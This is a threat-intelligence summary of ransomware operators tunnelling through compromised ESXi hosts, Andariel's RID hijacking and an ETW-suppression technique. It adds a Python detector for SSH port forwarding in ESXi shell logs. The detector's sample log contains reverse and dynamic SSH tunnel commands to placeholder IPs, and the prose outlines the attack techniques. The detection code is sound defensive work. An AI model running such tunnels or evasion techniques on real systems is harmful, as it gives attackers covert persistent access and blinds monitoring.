Summary: Security researchers have documented ransomware operators using compromised VMware ESXi hypervisors as stealthy SSH tunnels to their command-and-control (C2) infrastructure, giving them persistent, low-visibility access inside corporate networks. Separately, the North Korean Andariel group has been observed using Relative Identifier (RID) hijacking, which makes a low-privileged local account behave as a built-in administrator without the obvious trace of a newly created admin. Finally, a newly described evasion technique uses hardware breakpoints to interfere with Event Tracing for Windows (ETW), the telemetry source many detection products rely on.
Affected: ESXi systems, corporate networks, Windows systems
Keypoints:
- Ransomware operators turn compromised ESXi hosts into tunnels to C2 infrastructure, primarily via the hypervisor's built-in SSH service (port forwarding) and other tooling; because ESXi hosts are rarely shut down and often sit outside endpoint monitoring, the tunnel doubles as a long-lived backdoor.
- Initial access comes from compromised administrator credentials or known ESXi vulnerabilities; once on the appliance, the attackers enable SSH and establish a remote (reverse) SSH tunnel that survives as a persistent backdoor.
- The North Korean Andariel group uses RID hijacking: after first obtaining SYSTEM-level access, it edits the RID of a low-privileged or hidden local account in the SAM registry hive so that Windows treats the account as a built-in administrator, gaining admin rights without creating a conspicuously privileged user.
- A newly described evasion technique sets hardware breakpoints (CPU debug registers) on the functions that emit ETW events, letting malware intercept and suppress or alter telemetry before it reaches ETW-based detections.
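As an added example (not code from the article or from the researchers it cites), the following Python script shows the detection side of the first two keypoints: it scans ESXi shell command history for ssh invocations that set up port forwarding. The log path /var/log/shell.log, its line layout, and all hosts, ports and timestamps in the sample are assumptions constructed for this illustration.

```python
"""Flag SSH tunnelling commands in ESXi shell history.

Added example. Assumes the ESXi shell.log format
"<timestamp> shell[<pid>]: [<user>]: <command>"; the sample below is constructed.
"""
import re
import shlex
from dataclasses import dataclass, field

# Constructed sample lines in the assumed /var/log/shell.log layout (hypothetical hosts/ports).
SAMPLE_SHELL_LOG = """\
2025-01-20T10:01:12Z shell[2100]: [root]: esxcli system version get
2025-01-20T10:03:44Z shell[2100]: [root]: vim-cmd hostsvc/enable_ssh
2025-01-20T10:05:02Z shell[2100]: [root]: ssh -fN -R 127.0.0.1:1080:198.51.100.7:443 svc@198.51.100.7
2025-01-20T10:06:30Z shell[2100]: [root]: ssh -o StrictHostKeyChecking=no -D 9050 ops@203.0.113.9
2025-01-20T10:07:15Z shell[2100]: [root]: ssh root@192.0.2.10 'vim-cmd vmsvc/getallvms'
2025-01-20T10:08:01Z shell[2100]: [root]: esxcli vm process list
"""

SHELL_LOG_RE = re.compile(r"^(?P<ts>\S+) shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.+)$")

# ssh(1) options that take an argument; every other option is a bare flag and may be bundled (-fN).
SSH_ARG_OPTS = set("BbcDEeFIiJLlmOopQRSWw")
FORWARD_OPTS = {"R": "remote", "L": "local", "D": "dynamic"}


@dataclass
class SshTunnel:
    timestamp: str
    user: str
    destination: str                       # [user@]host the tunnel is anchored to
    forwards: list = field(default_factory=list)   # (kind, spec) pairs from -R/-L/-D
    background_no_command: bool = False    # -f and -N together: daemonised, command-less tunnel
    raw: str = ""


def parse_ssh_argv(argv):
    """Return (forwards, bare_flags, destination) for an ssh argv, or None if argv is not ssh."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return None
    forwards, flags, destination = [], set(), None
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            j = 1
            while j < len(tok):
                letter = tok[j]
                if letter in SSH_ARG_OPTS:
                    # Value is either glued on (-D9050) or the next token (-D 9050).
                    if j + 1 < len(tok):
                        value = tok[j + 1:]
                    else:
                        value = argv[i + 1] if i + 1 < len(argv) else ""
                        i += 1
                    if letter in FORWARD_OPTS:
                        forwards.append((FORWARD_OPTS[letter], value))
                    break
                flags.add(letter)
                j += 1
            i += 1
            continue
        destination = tok   # first non-option token; anything after it is the remote command
        break
    return forwards, flags, destination


def analyze_shell_log(text):
    """Return one SshTunnel per ssh command that configures port forwarding."""
    findings = []
    for line in text.splitlines():
        m = SHELL_LOG_RE.match(line)
        if not m:
            continue
        try:
            argv = shlex.split(m["cmd"])
        except ValueError:
            continue   # unbalanced quoting; skip the line rather than abort the scan
        parsed = parse_ssh_argv(argv)
        if parsed is None:
            continue
        forwards, flags, destination = parsed
        if not forwards:
            continue   # plain interactive or remote-command ssh is not a tunnel
        findings.append(SshTunnel(
            timestamp=m["ts"], user=m["user"], destination=destination or "?",
            forwards=forwards, background_no_command={"f", "N"} <= flags, raw=m["cmd"]))
    return findings


if __name__ == "__main__":
    for t in analyze_shell_log(SAMPLE_SHELL_LOG):
        tag = "daemonised tunnel" if t.background_no_command else "tunnel"
        print(f"{t.timestamp} {t.user}: {tag} to {t.destination} via {t.forwards}")
```

Only two of the three ssh commands in the sample are reported: the reverse SOCKS-style tunnel with -fN -R and the dynamic forward with -D. The plain ssh to another host with a remote command is ignored, which keeps routine administration out of the alert stream. The same parser works on lines from any host that records shell commands in this layout.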
Source: https://thehackernews.com/2025/01/ransomware-targets-esxi-systems-via.html